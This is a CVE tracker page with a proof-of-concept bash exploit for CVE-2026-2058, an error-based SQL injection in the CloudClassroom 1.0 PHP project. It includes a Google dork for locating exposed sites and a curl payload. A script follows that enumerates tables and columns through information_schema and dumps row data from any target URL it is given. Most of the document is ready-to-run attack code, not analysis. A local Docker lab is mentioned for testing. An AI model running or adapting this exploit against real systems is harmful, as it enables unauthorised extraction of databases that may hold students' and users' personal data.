5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-2058
README.md
Rendering markdown...
POC / CVE-2026-2058-PoC.sh SH
⬇ Raw GitHub ✕ Close 
# Exploit Title: CloudClassroom 1.0 - SQL Injection (Post Query)
# Google Dork: inurl:"postquerypublic" "Cloud Classroom"
# Date: 2026-03-11
# Exploit Author: Carlos Tuma
# Vendor Homepage: https://github.com/mathurvishal
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Version: 1.0
# Tested on: Ubuntu 20.04 / Apache / MySQL
# CVE: CVE-2026-2058

# Description:
# CloudClassroom PHP Project version 1.0 is vulnerable to an error-based SQL injection
# via the "squeryx" POST parameter in the /postquerypublic endpoint.

# Vulnerable Endpoint:
# POST /postquerypublic

# Docker Lab (for testing):
# docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

# Access:
# http://localhost:9292/postquerypublic

# PoC:
# curl -X POST http://TARGET/postquerypublic \
# -H "Content-Type: application/x-www-form-urlencoded" \
# --data-urlencode "gnamex=test" \
# --data-urlencode "[email protected]" \
# --data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
# --data-urlencode "update=Post Query!"

#!/bin/bash

TARGET="$1"

if [ -z "$TARGET" ]; then
echo "Usage: $0 http://target/postquerypublic"
exit
fi

echo "======================================="
echo " CloudClassroom SQL Injection Exploit"
echo " CVE-2026-2058"
echo "======================================="

extract(){

payload="$1"

curl -s -X POST "$TARGET" \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=a" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=$payload" \
--data-urlencode "update=Post Query!" \
| grep -oP "(?<=XPATH syntax error: '~).*?(?=~)"

}

echo
echo "[+] Extracting database..."

DB=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1")

echo "[+] Database: $DB"
echo

echo "[+] Enumerating tables..."

tables=()

for i in {0..30}
do

TABLE=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT $i,1),0x7e),1) AND '1'='1")

if [ -z "$TABLE" ]; then
break
fi

echo "  -> $TABLE"
tables+=("$TABLE")

done

echo
echo "======================================="
echo " Dumping database"
echo "======================================="

for table in "${tables[@]}"
do

echo
echo "[+] Table: $table"

columns=()

for i in {0..30}
do

COLUMN=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='$table' LIMIT $i,1),0x7e),1) AND '1'='1")

if [ -z "$COLUMN" ]; then
break
fi

echo "   Column -> $COLUMN"
columns+=("$COLUMN")

done

echo
echo "   Dumping data..."

for column in "${columns[@]}"
do

for row in {0..20}
do

DATA=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT $column FROM $table LIMIT $row,1),0x7e),1) AND '1'='1")

if [ -z "$DATA" ]; then
break
fi

echo "   [$column][$row] = $DATA"

done

done

done

echo
echo "[+] Dump finished"